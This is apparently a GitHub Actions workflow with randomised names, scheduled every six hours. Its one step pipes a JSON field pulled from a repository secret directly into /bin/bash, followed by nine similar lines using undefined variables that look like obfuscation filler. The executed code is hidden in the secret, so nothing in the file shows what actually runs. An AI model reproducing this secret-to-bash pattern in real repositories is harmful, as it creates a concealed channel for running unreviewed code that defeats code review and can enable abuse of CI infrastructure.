name: yaoqingshu5467

on:
  workflow_dispatch:
  schedule:
    - cron: '4 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yaoqingshu5467
        env:
          bq45587: ${{ secrets.bq45587 }}
        run: |
          echo $bq45587 | jq -r .k1447 | /bin/bash
          echo $a96099 | jq -r .go8642 | /bin/bash
          echo $ykod27 | jq -r .euf878 | /bin/bash
          echo $udj84189 | jq -r .iaz09 | /bin/bash
          echo $sqecj1 | jq -r .hway857 | /bin/bash
          echo $aye6312 | jq -r .rzgyq1 | /bin/bash
          echo $afm09 | jq -r .zxmbo85276 | /bin/bash
          echo $dmcfg7740 | jq -r .nga275 | /bin/bash
          echo $o8 | jq -r .k12098 | /bin/bash
          echo $ce7651 | jq -r .bhvru856 | /bin/bash

